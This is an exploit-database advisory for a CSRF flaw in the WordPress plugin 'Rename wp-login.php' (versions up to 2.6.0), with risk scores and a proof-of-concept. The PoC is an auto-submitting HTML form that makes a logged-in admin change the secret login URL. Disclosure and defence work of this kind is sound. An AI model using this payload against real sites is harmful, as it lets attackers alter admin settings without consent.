Lucene search

K
wpexploitDaniel RufWPEX-ID:3620A087-032E-4A5F-99C8-F9E7E9C29813
HistoryJun 16, 2022 - 12:00 a.m.

Rename wp-login.php <= 2.6.0 - Secret URL Update via CSRF

2022-06-1600:00:00
Daniel Ruf
77

0.001 Low

EPSS

Percentile

26.5%

The plugin does not have CSRF check in place when updating the secret login URL, which could allow attackers to make a logged in admin change them via a CSRF attack

<form id="test" action="https://example.com/wp-admin/options-permalink.php" method="POST">
    <input type="text" name="rwl_page" value="sesame-open">
</form>
<script>
    document.getElementById("test").submit();
</script>

0.001 Low

EPSS

Percentile

26.5%

Related for WPEX-ID:3620A087-032E-4A5F-99C8-F9E7E9C29813